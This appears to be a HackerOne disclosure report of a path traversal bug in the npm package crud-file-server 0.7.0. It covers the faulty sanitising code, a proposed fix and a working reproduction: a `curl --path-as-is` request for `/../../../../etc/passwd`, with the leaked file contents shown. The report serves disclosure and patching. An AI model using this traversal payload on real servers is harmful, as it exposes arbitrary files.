Hi Guys,
There is Path Traversal vulnerability in crud-file-server module, which allows to read arbitrary file from the remote server.
crud-file-server
This package exposes a directory and its children to create, read, update, and delete operations over http.
https://www.npmjs.com/package/crud-file-server
version: 0.7.0
Stats
0 downloads in the last day
26 downloads in the last week
220 downloads in the last month
~2500 estimated downloads per year
This vulnerability is caused by simple mistake in function which should block Path Traversal attempts:
// ./node_modules/crud-file-server/crud-file-server.js, line 4:
var cleanUrl = function(url) {
url = decodeURIComponent(url);
while(url.indexOf('..').length > 0) { url = url.replace('..', ''); }
return url;
};
As you can see, condition which checks existence of ..
is wrong, because url.indexOf()
returns index of found string or -1 if nothing matches; and has no length
property. Because of that, this condition is always false, thus url = url.replace('..', '');
is never executed.
The correct condition should be:
while(url.indexOf('..') > 0) { url = url.replace('..', ''); }
I’ve verified that this is enough to fix this vulnerability.
crud-file-server
module$ npm install crud-file-server
$ ./node_modules/crud-file-server/bin/crud-file-server -f ./ -p 8080
$ curl -v --path-as-is http://127.0.0.1:8080/../../../../etc/passwd
Result:
$ curl -v --path-as-is http://127.0.0.1:8080/../../../../etc/passwd
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /../../../../etc/passwd HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Type: application/octet-stream
< Content-Length: 6774
< Date: Wed, 31 Jan 2018 00:01:31 GMT
< Connection: keep-alive
<
##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
_taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false
(...)
After the patch described in Description is applied, the result of curl
command is as expected:
$ curl -v --path-as-is http://127.0.0.1:8080/../../../../etc/passwd
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /../../../../etc/passwd HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 500 Internal Server Error
< Content-Type: application/json
< Date: Wed, 31 Jan 2018 00:01:49 GMT
< Connection: keep-alive
< Content-Length: 71
<
* Connection #0 to host 127.0.0.1 left intact
{"errno":-2,"code":"ENOENT","syscall":"stat","path":"./////etc/passwd"}
Configuration:
Please feel free to invite module maintainer to this report. I haven’t contacted maintainer as I want to keep the process of fixing and disclosing bug consistent through HackerOne platform only.
I hope my report will help to keep Node.js ecosystem and its users safe in the future.
Regards,
Rafal ‘bl4de’ Janicki
This vulnerability allows to read content of any file on the server.